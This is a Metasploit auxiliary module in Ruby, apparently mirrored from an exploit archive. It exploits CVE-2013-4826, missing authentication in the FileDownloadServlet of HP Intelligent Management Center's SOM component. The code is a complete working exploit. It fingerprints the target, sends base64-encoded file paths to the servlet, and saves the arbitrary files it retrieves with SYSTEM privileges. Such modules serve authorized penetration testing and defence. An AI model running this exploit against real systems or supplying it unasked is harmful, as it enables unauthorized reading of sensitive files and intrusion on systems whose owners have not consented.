## https://sploitus.com/exploit?id=PACKETSTORM:181131
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Intelligent Management SOM FileDownloadServlet Arbitrary Download',
'Description' => %q{
This module exploits a lack of authentication and access control in HP Intelligent
Management, specifically in the FileDownloadServlet from the SOM component, in order to
retrieve arbitrary files with SYSTEM privileges. This module has been tested successfully
on HP Intelligent Management Center 5.2_E0401 with SOM 5.2 E0401 over Windows 2003 SP2.
},
'License' => MSF_LICENSE,
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-4826' ],
[ 'OSVDB', '98251' ],
[ 'BID', '62898' ],
[ 'ZDI', '13-242' ]
]
))
register_options(
[
Opt::RPORT(8080),
OptString.new('TARGETURI', [true, 'Path to HP Intelligent Management Center', '/imc']),
OptString.new('FILEPATH', [true, 'The path of the file to download', 'c:\\windows\\win.ini'])
])
end
def is_imc_som?
res = send_request_cgi({
'uri' => normalize_uri("servicedesk", "ServiceDesk.jsp"),
'method' => 'GET'
})
if res and res.code == 200 and res.body =~ /servicedesk\/servicedesk/i
return true
else
return false
end
end
def my_basename(filename)
return ::File.basename(filename.gsub(/\\/, "/"))
end
def run_host(ip)
unless is_imc_som?
vprint_error("HP iMC with the SOM component not found")
return
end
vprint_status("Sending request...")
res = send_request_cgi({
'uri' => normalize_uri("servicedesk", "servicedesk", "fileDownload"),
'method' => 'GET',
'vars_get' =>
{
'OperType' => '2',
'fileName' => Rex::Text.encode_base64(my_basename(datastore['FILEPATH'])),
'filePath' => Rex::Text.encode_base64(datastore['FILEPATH'])
}
})
if res and res.code == 200 and res.headers['Content-Type'] and res.headers['Content-Type'] =~ /application\/doc/
contents = res.body
fname = my_basename(datastore['FILEPATH'])
path = store_loot(
'hp.imc.somfiledownloadservlet',
'application/octet-stream',
ip,
contents,
fname
)
print_good("File saved in: #{path}")
else
vprint_error("Failed to retrieve file")
return
end
end
end